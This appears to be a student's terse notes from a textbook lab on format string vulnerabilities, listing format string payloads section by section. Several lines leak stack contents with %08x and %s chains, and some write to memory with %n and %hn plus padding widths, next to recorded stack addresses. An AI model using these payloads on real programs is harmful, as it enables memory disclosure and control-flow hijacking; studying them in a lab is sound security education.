
12.2.1
32
0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.
16
0x%08x.%s

12.2.2
0xbfffff00=3221225216
0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x
0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.%s
0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.\n%s
0xbfffefa8=‭3221221288‬
3221220040
0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.%s

12.2.3 改写指定内存地址单元的值
0xbfffefa0=‭3221221280

3221220032

0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.%.26417u%n


12.2.4
ABCD%08x.%08x.%08x.%08x.%08x.%08x.%08x.

ABCD%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.

0xbfffeac4=3221220036
%08x.%08x.%08x.%08x.%08x.%08x.%08x.
0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.%.26417u%n
0x%08x.0x%08x.0x%08x.0x%08x.0x%08x.%.26413u%n

%08x.%08x.%08x.%08x.%08x.%.47711u%hn%.17476u%hn.%08x.%08x.

